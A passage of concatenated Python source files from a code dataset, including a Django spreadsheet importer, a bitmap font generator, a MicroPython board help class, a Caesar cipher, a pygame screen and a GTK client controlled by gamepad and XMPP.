os.path.splitext(filename)[1].lower()[1:]\n assert ext in read_map, \\\n \"Input file not in correct format, must be xls, xlsx, csv, csv.gz, pkl; current format '{0}'\".format(ext)\n assert os.path.isfile(filename), \"File Not Found Exception '{0}'.\".format(filename)\n\n return read_map[ext](filename, **kwargs)\n\n\ndef process_import(data):\n \"\"\" for each row of the data dataframe,\n get or create the Initiative - must be at least one.\n\n get or create the Domain - must be at least one if there are Activities\n connect it to the Initiative.\n\n get or create the Activity - must be at least one if there are Statements\n connect it to the Domain.\n\n get of create the Statement if there is one in the uploaded file and\n connect it to the Activity.\n\n \"\"\"\n\n for row in data.itertuples():\n\n # handle the Domain\n if getattr(row, \"DomainCode\"):\n domain_obj, created = Domain.objects.get_or_create(code=getattr(row, \"DomainCode\"))\n # update the record either way\n domain_obj.name = getattr(row, \"Domain\")\n domain_obj.default_weight = getattr(row, \"DomainDefaultWeight\")\n domain_obj.save()\n else:\n # define null domain_obj so that the FBA does not error\n domain_obj = None\n\n # handle the FBA\n if getattr(row, \"FBACode\"):\n activity_obj, created = Activity.objects.get_or_create(code=getattr(row, \"FBACode\"))\n # update the record either way\n activity_obj.name = getattr(row, \"FBA\")\n activity_obj.parent_domain = domain_obj\n activity_obj.default_impact = getattr(row, \"FBADefaultImpact\")\n activity_obj.default_likelihood = getattr(row, \"FBADefaultLikelihood\")\n activity_obj.save()\n\n # TODO: add the TopicActivityMapping records\n else:\n # define null activity_obj so that the Statement does not error\n activity_obj = None\n\n # handle the Statememt\n if getattr(row, \"StatementCode\"):\n statement_obj, created = Statement.objects.get_or_create(code=getattr(row, \"StatementCode\"))\n # update the record either way\n statement_obj.name = getattr(row, \"Statement\")\n statement_obj.parent_activity = activity_obj\n statement_obj.default_weight = getattr(row, \"StatementDefaultWeight\")\n statement_obj.save()\n","sub_path":"acuitybpa/acuitybpa/library/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"292338246","text":"import time\nfrom threading import Thread\nimport threading\nfrom threading import Semaphore\nvalue = 0\n\nsema = Semaphore(3)\n\nlock = threading.Lock()\n\ndef getlock():\n global value\n with sema:\n new = value +1\n time.sleep(0.001)\n value=new\n\n\nthreads = []\n\n\nfor i in range(100):\n t = Thread(target=getlock)\n t.start()\n threads.append(t)\n\nfor t in threads:\n t.join()\n\nprint(value)","sub_path":"flaskweb/test1/crash/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"529282625","text":"#!/usr/bin/python3\n#Copyright 2019 Wong Cho Ching \n#\n#Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:\n#\n#1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n#\n#2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n#\n#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport sys\n\nreadingCharacterRow = -1 #-1 = looking for first row.\n\ncharacterData = []\ncharacterOffset = 0\nwith open('font.txt', 'r') as fontFile:\n\tcharacterUnit = 1\n\tcharacter = [0,0,0,0,0]\n\tfor i in fontFile.readlines():\n\t\ti = i.replace('\\n', '')\n\t\tif readingCharacterRow == -1:\n\t\t\ti = i.strip()\n\t\t\tif len(i) == 0:\n\t\t\t\tcontinue\n\t\t\tcodePoint = int(i[0:2], 16)\n\t\t\treadingCharacterRow = 0\n\t\t\tcharacter = [0,0,0,0,0]\n\t\telse:\n\t\t\tfor c in range(5):\n\t\t\t\tcharacter[c] += (0 if i[c]==' ' else 1)*(2**readingCharacterRow)\n\t\t\tif readingCharacterRow == 7:\n\t\t\t\treadingCharacterRow = -1\n\t\t\t\tcharacterData.append((codePoint, character))\n\t\t\telse:\n\t\t\t\treadingCharacterRow += 1\n\ncharacterData = sorted(characterData)\ncharacterDataWithFiller = []\nfor codePoint in range(characterData[0][0], characterData[-1][0]+1):\n\tfor data in characterData:\n\t\tif codePoint == data[0]:\n\t\t\tcharacterDataWithFiller.append(data)\n\t\t\tbreak\n\telse:\n\t\tcharacterDataWithFiller.append((codePoint,[0,0,0,0,0]))\n\nprint('const static uint8_t FONT_DATA[][5] = {')\nfor item in characterDataWithFiller:\n\tcodePoint = item[0]\n\tdata = item[1]\n\tprint('\\t{', end='')\n\tfor j in data:\n\t\tprint('{}, '.format(hex(int(j))), end='')\n\tprint(\"}}, // {:02x} '{}'\".format(codePoint, chr(codePoint)))\nprint('};')\n\n\nsys.stderr.write(\"Code generation completed! Now generating image for the font (requires PIL)...\\n\")\nDOT_SIZE = 10\nDOT_MARGIN = 2\nimport PIL.Image, PIL.ImageDraw\nimport shutil\nimport os\n\nOUTPUT_DIR = './generated_images'\nif os.path.exists(OUTPUT_DIR):\n\tshutil.rmtree(OUTPUT_DIR)\nos.mkdir(OUTPUT_DIR)\nfor item in characterData:\n\tcodePoint = item[0]\n\tdata = item[1]\n\timg = PIL.Image.new( 'RGBA', (5*(DOT_SIZE+DOT_MARGIN),7*(DOT_SIZE+DOT_MARGIN)), \"white\")\n\tdraw = PIL.ImageDraw.Draw(img)\n\tfor index, row in enumerate(data):\n\t\ty = 0\n\t\twhile y <= 7:\n\t\t\tdraw.rectangle(\n\t\t\t\t(\n\t\t\t\t\t(DOT_MARGIN+index*(DOT_SIZE+DOT_MARGIN), DOT_MARGIN+y*(DOT_SIZE+DOT_MARGIN)),\n\t\t\t\t\t(DOT_MARGIN+index*(DOT_SIZE+DOT_MARGIN)+DOT_SIZE, DOT_MARGIN+y*(DOT_SIZE+DOT_MARGIN)+DOT_SIZE)\n\t\t\t\t),\n\t\t\t\t(0, 0, 0, 255) if row&(1<output_size:\n sent += gen.replace('▁', ' ')\n toked = self.tok(sent)\n count =0\n break\n sent += gen.replace('▁', ' ')\n toked = self.tok(sent)\n count += 1\n \n loc = 0\n sent = sent.replace('', '').replace('', '')\n conv = False\n for s in range(len(sent)) :\n if conv == False : \n if sent[s] == \"\\\"\" :\n conv = True\n elif sent[s] =='.' :\n loc = s\n else :\n if sent[s] == \"\\\"\" :\n conv = False\n loc = s\n \n \n if loc != 0 :\n sent = sent[:loc+1]\n \n print(\"time is \", time.time() - start)\n \n return sent","sub_path":"flask_server/TextGeneration/Module/StoryGenerator_photory.py","file_name":"StoryGenerator_photory.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"587677190","text":"#-----------------------\n# imports\n#-----------------------\n\nfrom micropython import const\n\n#-----------------------\n# funboard variables class\n#-----------------------\n\nclass BOARD:\n\n BOARD_NAME = 'FUNBOARD-V1'\n BOARD_DATE = '2021-01-06'\n\n # sdcard ref: https://docs.micropython.org/en/latest/library/machine.SDCard.html\n SDCARD_SLOT = const( 3) #\n PIN_SD_CS = const(27) # SDCard non-standard \n PIN_SD_SCL = const(14) # SDCard Slot 3\n PIN_SD_MOSI = const(13) # SDCard Slot 3\n PIN_SD_MISO = const(12) # SDCard Slot 3\n \n PIN_MANRST = const(15) # --> RESET\n PIN_LED = const(32) # Blue LED\n PIN_PIXELS = const( 4) # 8 Micro Pixels\n PIN_BUZZER = const( 2) # Buzzer\n PIN_PROG = const( 0) # PROG Button\n PIN_UART1_TX = const(17) # UART\n PIN_UART1_RX = const(16) # UART\n PIN_SPI2_CS = const( 5) # SPI-2\n PIN_SPI2_SCL = const(18) # SPI-2\n PIN_SPI2_MISO = const(19) # SPI-2\n PIN_SPI2_MOSI = const(23) # SPI-2\n PIN_I2C1_DATA = const(26) # I2C-1\n PIN_I2C1_CLK = const(25) # I2C-1\n\n helplines = '''\n\n key 1 funboard info, help, and variables\n funboard.info # version and name\n funboard.help # basic help\n funboard.show('module') # more detailed help \n dir(funboard) # lists a bunch of pins\n\n key 2 esp32 esp32 sensors, values, reset\n esp32.reset # hard reset\n esp32.temp # temperature C\n esp32.tempf # temperature F\n esp32.hall # read hall sensor\n esp32.memory # memory use\n esp32.flash # disk use\n\n key 3 beeper beep the buzzer\n beeper.beep() # beep\n beeper.beepn(count) # beep n times\n beeper.beep2(freq1,freq2) # a beep that changes freq\n beeper.play(notestring) # play a string of notes\n\n key 4 led control the blue led \n led.on()\n led.off()\n led.blink(count) # blink \"count\" times\n led.pwm(percent) # use pwm to dim the led\n led.pwm2(p1,p2) # change led from p1 to p2 \n\n key 5 pixels control the funboard micro pixels\n set: pixels.brightness = 32 # 0-255, set global\n pixels.off() # all off\n pixels.kill() # makes gpio pin an imput\n pixels.setp(pixel,color,brightness) # set a pixel 0-7\n pixels.set_brightness(32) # set global, adjust current\n pixels.sweep(color,brightness) # like KITT from Knight Rider\n\n key 6 sdcard SDcard mount, format, etc\n sdcard.mount() # mount sd card, runs on boot\n sdcard.unmount() # unmount sdcard to remove it\n sdcard.sdpath() # show path to sd card\n sdcard.format() # erase/format the sd card\n\n key 7 wifi connect to local wifi\n set: essid = \"my_essid\"\n set: password = \"my_password\"\n wifi.scan() # list available access points\n wifi.connect(essid,password) # or use set values\n wifi.disconnect()\n\n key 8 rtc real time clock functions\n rtc.ntp_set() # set time (after wifi connect)\n rtc.set(datetime_tuple) # manual set\n rtc.get() # get the rtc time\n rtc.linux_epoch() # seconds since jan 1 1970\n rtc.dtstamp() # datetime string\n\n key 9 eziot store data on the cloud\n set: eziot.api_key = \"my_account_key\"\n set: eziot.api_secret = \"my_account_secret\"\n set: eziot.api_version = 1.0\n eziot.stats()\n eziot.post_data(group,device,data1,data2,data3,data4)\n eziot.get_data(count,after,group,device)\n eziot.delete_data(rowids,before,xall)\n eziot.watch(startrows,update,group,device)\n\n key 10 st system tools for dirs, file, etc.\n st.tree() # print directory tree structure\n st.remove('filepath') # remove a file\n st.rmdir('dirpath') # remove a dir\n st.isfile('path')\n st.isdir('path')\n st.exists('path')\n st.abspath('path')\n st.mkdir('dirpath')\n st.pf('filepath') # print file to screen\n st.pp(object) # pretty print a dict, list, etc\n st.reload(module) # reload module\n st.du() # show disk usage\n st.memp() # clean memory and show usage percent\n st. ... # more functions, see the docs\n \n '''\n\n def __init__(self):\n\n # build help\n self.help1,self.help2 = [],{}\n self.helplines = self.helplines.split('\\n')\n key = ''\n for line in self.helplines:\n line = line.strip()\n if line:\n if line.startswith('key '):\n nada,order,key,desc = ([x.strip() for x in line.split(None,3)]+['','','',''])[:4]\n if order.isdigit():\n order = int(order)\n else:\n order = 1000\n self.help1.append((order,key,desc))\n self.help2[key] = [] \n else:\n self.help2[key].append(line)\n del self.helplines\n self.help1.sort()\n self.help1 = [(key,desc) for order,key,desc in self.help1]\n\n @property\n def info(self):\n print('{} {}'.format(self.BOARD_NAME,self.BOARD_DATE))\n\n @property\n def help(self):\n print('{} Extras:'.format(self.BOARD_NAME))\n width = max([len(key) for key,desc in self.help1])\n for key,desc in self.help1:\n key = key + ' '*max(0,width-len(key))\n if desc:\n print(' {} = {}'.format(key,desc))\n else:\n print(' {}'.format(key))\n\n def show(self,module=None):\n if module not in self.help2:\n print('Unknown MODULE: {}'.format(module))\n else:\n print('FunBoard MODULE: {}'.format(module))\n width = max([len(x.split('#')[0].strip()) for x in self.help2[module]])\n for line in self.help2[module]:\n funct,desc = [x.strip() for x in (line+'#').split('#')][:2]\n funct = funct + ' '*max(0,width-len(funct))\n if desc:\n print(' {} = {}'.format(funct,desc))\n else:\n print(' {}'.format(funct))\n print('Be sure to check the documentation for details!')\n print('GitLab: https://gitlab.com/duder1966/youtube-projects')\n\n def test(self):\n led.on()\n beeper.beep()\n pixels.sweep('red',ontime=100,offtime=100)\n st.tree()\n pixels.sweep('blue',ontime=100,offtime=100)\n wifi.scan()\n pixels.sweep('green',ontime=100,offtime=100)\n led.off()\n esp32.reset()\n\n\n#-----------------------\n# end\n#-----------------------\n","sub_path":"Dimension/FunBoard/v1/code/lib/funboard/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649070228","text":"#!/opt/pyenv/shims/python3\nimport sys\n\n#validate the argument count\nif(len(sys.argv) != 2):\n print(\"Usage: ./caesar \")\n exit(1)\n\n#validate the key\nkey = sys.argv[1]\nwhile True:\n try:\n intKey = int(key)\n if(intKey < 0):\n key = input(\"Please enter key equal to or greater than zero: \")\n else:\n validKey = int(key) % 26\n break\n except:\n key = input(\"Invalid; enter new key: \")\n\n#declare and get our input (did not validate for numbers)\nplaintext = input(\"plaintext: \")\nciphertext = \"\"\n\n\n#implement the formula\nfor letter in plaintext:\n if letter.isupper():\n ciphertext+=chr((((ord(letter)+intKey)-65)%26)+65)\n elif letter.islower():\n ciphertext+=chr((((ord(letter)+intKey)-97)%26)+97)\n else : ciphertext+=letter\n\nprint(f\"ciphertext: {ciphertext}\")","sub_path":"cs50/intro_comp_sci/pset6/caesar/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"41467605","text":"# Setup Python\r\nimport pygame, sys\r\n\r\n#Création de la page\r\nmainClock = pygame.time.Clock()\r\nfrom random import randint\r\nfrom pygame import *\r\npygame.init()\r\npygame.display.set_caption('RAP GAME')\r\nscreen = pygame.display.set_mode((1280, 720),0,32)\r\n\r\nessaie = pygame.image.load('essaie.png')\r\n\r\n#son = pygame.mixer.Sound(\"assets/menu.wav\")\r\n\r\nfont = pygame.font.SysFont(None, 50)\r\n\r\ndef text(text, font, color, surface, x, y):\r\n\ttextobj = font.render(text, 1, color)\r\n\ttextrect = textobj.get_rect()\r\n\ttextrect.topleft = (x, y)\r\n\tsurface.blit(textobj, textrect) \r\n\r\nclock = pygame.time.Clock()\r\n\r\nclick = False \r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef credits():\r\n\t\r\n\trunning = True\r\n\twhile True:\r\n\t\tscreen.blit(essaie, (0,0))\r\n\r\n\t\tclick = False\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == QUIT:\t\r\n\t\t\t\tpygame.quit()\r\n\t\t\t\tsys.exit()\r\n\t\t\tif event.type == KEYDOWN:\r\n\t\t\t\tif event.key == K_ESCAPE:\r\n\t\t\t\t\tpygame.quit()\r\n\t\t\t\t\tsys.exit()\r\n\t\t\t\t\tmenu()\r\n\t\t\tif event.type == MOUSEBUTTONDOWN:\r\n\t\t\t\tif event.button == 1:\r\n\t\t\t\t\tclick = True\r\n\t\tpygame.display.update()\r\n\t\tmainClock.tick(60)","sub_path":"credits.py","file_name":"credits.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87418428","text":"\n# Given a 2D binary matrix filled with 0's and 1's, find the largest square containing only 1's and return its area.\n\nclass Solution(object):\n def maximalSquare(self, matrix):\n if len(matrix) == 0:\n return\n area = 0\n sol = [[0 for i in range(len(matrix[0]))]for j in range(len(matrix))]\n for i in range(len(matrix)):\n sol[i][0] = int(matrix[i][0])\n if sol[i][0] == 1:\n area = 1\n for i in range(1,len(matrix[0])):\n sol[0][i] = int(matrix[0][i])\n if sol[0][1] == 1:\n area = 1\n for i in range(1,len(matrix)):\n for j in range(1,len(matrix[0])):\n if matrix[i][j] == '1':\n sol[i][j] = min(int(sol[i][j-1]),int(sol[i-1][j]),int(sol[i-1][j-1]))+1\n area = max(sol[i][j],area)\n else:\n sol[i][j] = 0\n return area * area\n\n\n\nif __name__ == '__main__':\n arr = [[\"0\",\"0\"],[\"0\",\"1\"]]\n solution = Solution()\n print(solution.maximalSquare(arr))","sub_path":"Maximal Square.py","file_name":"Maximal Square.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"646911181","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk, GObject\nfrom inputs import get_gamepad\nimport threading\nimport sleekxmpp\nimport json\n\n\n\"\"\"\nGlobal Scope Variabeln\n\"\"\"\n\n#Zustand, in dem sich das Programm grad befindet\ndispMenu = True\nisConnected = False\ndispOverlay = False\nrolle = None\nconnectedTo = None\n\n#Gamepad Transmitter; globalisiert, weil von sehr unterschiedlichen Orten drauf zugegriffen werden muss; nicht ganz sicher, ob das nötig ist.\ngpInt = 0\ngpXMPP = None\n\n\"\"\"\nUitlity/Helfer-Funktionen\n\"\"\"\n\n#JSON validieren/Error Handling\ndef is_json(myjson):\n\ttry:\n\t\tjson_object = json.loads(myjson)\n\texcept ValueError:\n\t\treturn False\n\treturn True\n\n\n\"\"\"\nctrl XMPP Event Emitter\nhört auf den ctrl Chatroom,\nemittiert einen Event, wenn die receiver-Komponente der eigenen rolle entspricht\naufgeteilt auf Klasse, die verbindet und Verpackung, um connect()-Kollision zu vermeiden\n\"\"\"\nclass xmppBot(sleekxmpp.ClientXMPP):\n\n\tdef __init__(self, jid, password, room, nick):\n\n\t\t#Übergeordnete Klasse initialisieren\n\t\tprint(\"init Method started\")\n\t\tsleekxmpp.ClientXMPP.__init__(self, jid, password)\n\n\t\t#Instanz-Variablen festlegen\n\t\tself.room = room\n\t\tself.nick = nick\n\n\t\t#Event-Handler definieren\n\t\tself.add_event_handler(\"session_start\", self.start, threaded=False)\n\t\t#self.add_event_handler(\"groupchat_message\", self.message) #NOPE! Erst die Verpackungsklasse hängt diesen Event Handler an\n\n\t#Start-Methode: Verbindung etablieren\n\tdef start(self, event):\n\t\tself.send_presence()\n\t\tself.get_roster()\n\t\tself.plugin['xep_0045'].joinMUC(self.room, self.nick, wait=True)\n\t\tprint(\"Start Method finished\")\n\n\n#Verpackungsklasse, um alles mit einer Zeile starten zu können & connect()-Kollision umgehen\n#Erst diese Klasse hängt einen Event Handler an xmppBot, die selbst keinen für die Nachrichten hat; die Verpackungsklasse muss auf den Event reagieren, sonst connect()-Kollision\nclass xmppWrapper(GObject.GObject):\n\n\t__gsignals__ = {\n\t\t'relevantMsg': (GObject.SIGNAL_RUN_FIRST, None, (str,str,str,)),\n\t}\n\n\tdef __init__(self, jid, password, room, nick):\n\t\tGObject.GObject.__init__(self)\n\t\tself.ready = False\n\t\tself.room = room\n\t\tself.wrappedClient = xmppBot(jid, password, room, nick)\n\t\tself.wrappedClient.add_event_handler(\"groupchat_message\", self.message) #Hier wird der Event Handler an die xmppBot-Instanz gehängt\n\t\tself.wrappedClient.register_plugin('xep_0045') # Multi-User Chat\n\t\tself.wrappedClient.register_plugin('xep_0030') # Service Discovery\n\t\tself.wrappedClient.register_plugin('xep_0199') # XMPP Ping\n\t\tself.wrappedClient.connect()\n\t\tself.wrappedClient.process()\n\t\tself.ready = True\n\t\tprint(\"process executed\")\n\n\tdef message(self, msg):\n\t\tprint(\"Event listener groupmessage fired\")\n\t\tif is_json(msg[\"body\"]):\n\t\t\tdecodedMsg = json.loads(msg[\"body\"])\n\t\t\tif \"receiver\" in decodedMsg:\n\t\t\t\tif decodedMsg[\"receiver\"] == rolle:\n\t\t\t\t\tif \"sender\" in decodedMsg:\n\t\t\t\t\t\temitSender = decodedMsg[\"sender\"]\n\t\t\t\t\telse:\n\t\t\t\t\t\temitSender = None\n\t\t\t\t\tif \"action\" in decodedMsg:\n\t\t\t\t\t\temitAction = decodedMsg[\"action\"]\n\t\t\t\t\telse:\n\t\t\t\t\t\temitAction = None\n\t\t\t\t\tif \"value\" in decodedMsg:\n\t\t\t\t\t\temitValue = decodedMsg[\"value\"]\n\t\t\t\t\telse:\n\t\t\t\t\t\temitValue = None\n\t\t\t\t\tself.emit(\"relevantMsg\", emitSender, emitAction, emitValue)\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\tdef send(self, msg):\n\t\tself.wrappedClient.send_message(mto=self.room, mbody=msg, mtype=\"groupchat\")\n\n\n\t#Beenden-Methode\n\tdef cutConnection(self):\n\t\tself.wrappedClient.disconnect()\n\n\n\n\"\"\"\nGamepad Event Emitter\n\"\"\"\nclass gpEventEmitter(GObject.GObject):\n\n\t__gsignals__ = {\n\t\t'relevantButton': (GObject.SIGNAL_RUN_FIRST, None, (str,)),\n\t}\n\n\n\tdef __init__(self):\n\t\tGObject.GObject.__init__(self)\n\n\n\tdef startListening(self):\n\t\twhile 1:\n\t\t\tevents = get_gamepad()\n\t\t\tfor event in events:\n\n\t\t\t\t# Event emitter für Client Menu Führung\n\t\t\t\tif dispMenu:\n\t\t\t\t\tif event.ev_type == \"Key\" and event.code == \"BTN_BASE4\" and event.state == 1:\n\t\t\t\t\t\tself.emit(\"relevantButton\", \"start\") #Signal, das abgefeuert wird + die Argumente, die es mitliefern muss\n\t\t\t\t\telif event.ev_type == \"Absolute\" and event.code == \"ABS_Y\":\n\t\t\t\t\t\tif event.state < 100:\n\t\t\t\t\t\t\tself.emit(\"relevantButton\", \"up\")\n\t\t\t\t\t\telif event.state > 200:\n\t\t\t\t\t\t\tself.emit(\"relevantButton\", \"down\")\n\n\t\t\t\t# Event emitter für Client Interface\n\t\t\t\telif not dispMenu:\n\n\t\t\t\t\t#Gamepad-Zustand an Cyborg senden - falls nötig\n\t\t\t\t\tif isConnected and not dispOverlay and gpXMPP is not None:\n\n\t\t\t\t\t\tif gpXMPP.ready:\n\t\t\t\t\t\t\tglobal gpInt\n\t\t\t\t\t\t\tbuttonList = [\"BTN_TRIGGER\", \"BTN_THUMB\",\"BTN_THUMB2\",\"BTN_TOP\"]\n\t\t\t\t\t\t\taxesList = [\"ABS_X\", \"ABS_Y\"]\n\t\t\t\t\t\t\tbuttonCounter = 0\n\t\t\t\t\t\t\trelevantChanges = 0\n\n\t\t\t\t\t\t\t#Alle Buttons durchschleifen\n\t\t\t\t\t\t\tfor eachButton in buttonList:\n\t\t\t\t\t\t\t\tif event.ev_type == \"Key\" and event.code == eachButton:\n\t\t\t\t\t\t\t\t\trelevantChanges += 1\n\t\t\t\t\t\t\t\t\tif event.state == 1 and gpInt & 2**buttonCounter == 0:\n\t\t\t\t\t\t\t\t\t\tgpInt += 2**buttonCounter\n\t\t\t\t\t\t\t\t\telif gpInt & 2**buttonCounter > 0:\n\t\t\t\t\t\t\t\t\t\tgpInt -= 2**buttonCounter\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\t\tbuttonCounter += 1\n\n\t\t\t\t\t\t\t#Alle Achsen durchschleifen\n\t\t\t\t\t\t\tfor eachAxe in axesList:\n\t\t\t\t\t\t\t\tif event.ev_type == \"Absolute\" and event.code == eachAxe:\n\t\t\t\t\t\t\t\t\trelevantChanges += 1\n\t\t\t\t\t\t\t\t\tif event.state < 100 and gpInt & 2**buttonCounter == 0:\n\t\t\t\t\t\t\t\t\t\tgpInt += 2**buttonCounter\n\t\t\t\t\t\t\t\t\telif event.state > 200 and gpInt & 2**(buttonCounter + 1) == 0:\n\t\t\t\t\t\t\t\t\t\tgpInt += 2**(buttonCounter + 1)\n\t\t\t\t\t\t\t\t\telif gpInt & (2**buttonCounter) > 0 and gpInt & 2**buttonCounter > 0:\n\t\t\t\t\t\t\t\t\t\tgpInt -= 2**buttonCounter\n\t\t\t\t\t\t\t\t\telif gpInt & (2**(buttonCounter + 1)) > 0 and gpInt & 2**(buttonCounter + 1) > 0:\n\t\t\t\t\t\t\t\t\t\tgpInt -= 2**(buttonCounter + 1)\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\t\tbuttonCounter += 2\n\n\t\t\t\t\t\t\t#Nachricht bauen und senden\n\t\t\t\t\t\t\tif relevantChanges > 0:\n\t\t\t\t\t\t\t\tgpMsg = {}\n\t\t\t\t\t\t\t\tgpMsg[\"sender\"] = rolle\n\t\t\t\t\t\t\t\tgpMsg[\"receiver\"] = connectedTo\n\t\t\t\t\t\t\t\tgpMsg[\"action\"] = \"gamepad\"\n\t\t\t\t\t\t\t\tgpMsg[\"value\"] = gpInt\n\t\t\t\t\t\t\t\tgpXMPP.send(json.dumps(gpMsg))\n\n\n\t\t\t\t\t# Overlay triggern\n\t\t\t\t\tif not dispOverlay and event.ev_type == \"Key\" and event.code == \"BTN_BASE4\" and event.state == 1:\n\t\t\t\t\t\tself.emit(\"relevantButton\", \"start\")\n\t\t\t\t\t# Zurück zum Menu\n\t\t\t\t\telif dispOverlay and event.ev_type == \"Key\" and event.code == \"BTN_THUMB\" and event.state == 1:\n\t\t\t\t\t\tself.emit(\"relevantButton\", \"rot\")\n\t\t\t\t\t# Overlay wieder verstecken\n\t\t\t\t\telif dispOverlay and event.ev_type == \"Key\" and event.code == \"BTN_TOP\" and event.state == 1:\n\t\t\t\t\t\tself.emit(\"relevantButton\", \"grun\")\n\n\n\n\"\"\"\nDie GTK-Klasse, die das effektive Fenster zeichnet und an der alle Event Listeners hängen\n\"\"\"\nclass ButtonWindow(Gtk.Window):\n\n\tdef __init__(self):\n\n\t\t\"\"\"\n\t\tZuerst die graphischen Dinge, die Fenster und Bedienelemente werden gezeichnet\n\t\t\"\"\"\n\n\t\t#Konfiguration der Klasse\n\t\tself.anzClients = 2 #Wieviele Clients gibt's, wieviele Buttons werden gezeichnet\n\n\t\t#übergeordnete Klasse (GTK) wird initialisiert\n\t\tGtk.Window.__init__(self, title=\"Button Demo\")\n\n\t\t#GTK global\n\t\tself.set_border_width(10)\n\t\tself.menubox = Gtk.Box(spacing=6)\n\t\tself.add(self.menubox)\n\n\t\t#GTK für die Client-Menuführung\n\t\tself.btnList = [] #Hierrein werden die Button-Objekte gespeichert\n\t\tself.selectedButton = -1 #Speicher, welcher Button im Moment durch das Gamepad selektioniert wurde\n\t\tfor nBtn in range(0, self.anzClients): #Für jeden Client einen Button zeichnen und in btnList speichern\n\t\t\tself.btnList.append(Gtk.Button(\"Client %d\" % (nBtn + 1))) #Text draufschreiben\n\t\t\tself.btnList[nBtn].connect(\"clicked\", self.dispIF, \"client%d\" % nBtn) #Event Listener/auszuführende Funktion anhängen\n\t\t\tself.menubox.pack_start(self.btnList[nBtn], True, True, 0) #Keine Ahnung, was das macht\n\n\t\t#GTK für das Client-Interface\n\t\tself.ifTestLabel = Gtk.Label(\"Hier VLC imaginieren\")\n\t\tself.ifOverlay = Gtk.Label(\"Wirklich beenden? rot: JA! // grün: NEIN!\")\n\t\tself.menubox.pack_start(self.ifTestLabel, True, True, 0)\n\t\tself.menubox.pack_start(self.ifOverlay, True, True, 0)\n\n\t\t\"\"\"\n\t\tAlle Event Listeners werden definiert und an die GTK-Instanz gehängt\n\t\tWo nötig werden eigene Threads für die Event Emitter gestartet\n\t\t\"\"\"\n\n\t\t#XMPP-Listener für ctrl-Room, an GTK hängen\n\t\tself.ctrlXMPP = xmppWrapper(\"ice@ice.midi.xyz\", \"me_like!\", \"ctrl@conference.ice.midi.xyz\", \"ice\")\n\t\tself.ctrlXMPP.connect(\"relevantMsg\", self.ctrlDetected)\n\n\t\t#Gamepad-Listener an GTK anhängen\n\t\tgpListener = gpEventEmitter()\n\t\tgpListener.connect(\"relevantButton\", self.buttonDetected) #Event Listener anhängen: Signal-Name, Callback -> die Argumente, die dem Callback übergeben werden, sind definiert durch die emit-Funktion\n\t\tgpThread = threading.Thread(target=gpListener.startListening, args=()) #Aus der Methode, die den Loop enthält, wird ein Thread gemacht\n\t\tgpThread.start() #Der Thread/Loop wird gestartet\n\n\n\t\"\"\"\n\tctrl XMPP Callback\n\t\"\"\"\n\tdef ctrlDetected(self, data1, sender, action, value):\n\t\tprint(\"Message detected\")\n\t\tprint(\"I'll have to %s\" %action)\n\n\t\t#Verbindung zu einem Cyborg herstellen\n\t\tif action == \"connect\":\n\t\t\tself.connectCyborg(sender)\n\n\t\t#Cyborg will die Verbindung beenden\n\t\tif action == \"disconnect\":\n\t\t\tself.disconnectCyborg(setResponse=False)\n\n\n\t\"\"\"\n\tGamepad Listener Callback, an GTK angehänt\n\t\"\"\"\n\tdef buttonDetected(self, data1, data2):\n\t\tprint(\"button detected!\")\n\t\tprint(data2)\n\n\t\tif dispMenu:\n\t\t\tif data2 == \"down\":\n\t\t\t\tif self.selectedButton < self.anzClients - 1:\n\t\t\t\t\tself.selectedButton += 1\n\t\t\t\tself.markBtn(self.selectedButton)\n\t\t\telif data2 == \"up\":\n\t\t\t\tif self.selectedButton > 0:\n\t\t\t\t\tself.selectedButton -= 1\n\t\t\t\tself.markBtn(self.selectedButton)\n\t\t\telif data2 == \"start\" and self.selectedButton >= 0:\n\t\t\t\tself.dispIF(None, \"client%d\" % self.selectedButton) #erstes Argument None, 